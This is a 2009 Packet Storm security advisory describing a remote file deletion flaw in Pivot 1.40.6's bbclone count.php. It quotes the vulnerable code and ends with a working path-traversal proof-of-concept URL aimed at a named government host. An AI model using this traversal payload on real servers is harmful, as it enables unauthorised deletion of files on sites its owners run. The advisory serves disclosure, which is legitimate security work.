Pivot 1.40.6 File Deletion

2009-03-19T00:00:00
ID PACKETSTORM:75855
Type packetstorm
Reporter Alfons Luja
Modified 2009-03-19T00:00:00

Description

                                        
                                            `Pivot 1.40.6 Remote File Delete   
  
Alfons Luja  
  
Vuln :  
  
extensions/bbclone_tools/hr_conf.php line 20  
  
...  
  
$bbclone_debug = false; //is never change   
  
...  
  
=========================================================  
  
extensions/bbclone_tools/count.php  
  
  
...  
  
  
if ( ($_GET["refkey"]!="") && file_exists("$refkeydir/".$_GET["refkey"])) { [1]  
  
if ($bbclone_debug==true) { echo "Refkey found..<br />"; }  
  
// Getting the time offset between the web and file server (if there is any)  
$offset = timediffwebfile($bbclone_debug);  
  
if ((time() - filectime("$refkeydir/".$_GET["refkey"])) < (1000+$offset)) { [2]  
  
include("do_count.php");  
if ($bbclone_debug!=true) {  
header("content-type:image/gif");  
readfile("pixel.gif");  
} else {  
echo "Counted normally";  
}  
die();  
  
} else if ($bbclone_debug==true) {  
echo "too old!";  
}  
  
if ($bbclone_debug!=true) { [3]  
unlink("$refkeydir/".$_GET["refkey"]);  
}  
}  
  
...  
  
  
1] . We can put existent file   
  
2] . Time dependences   
If current time - last modification time < 1000 + $offset (usually 1001,1002 not more)  
We must wait a moment other way 'exploit dosent work'   
  
3] . $bbclone_debug is always false so if condition from point [2] == false   
We can delete some file   
  
  
If register globals is ON we can using this bug to include some file   
  
poc :  
  
http://www.pentagon.gov/~pivot_1406_full/extensions/bbclone_tools/count.php?refkey=../../../extensions/bbclone_tools/hr_conf.php  
  
  
`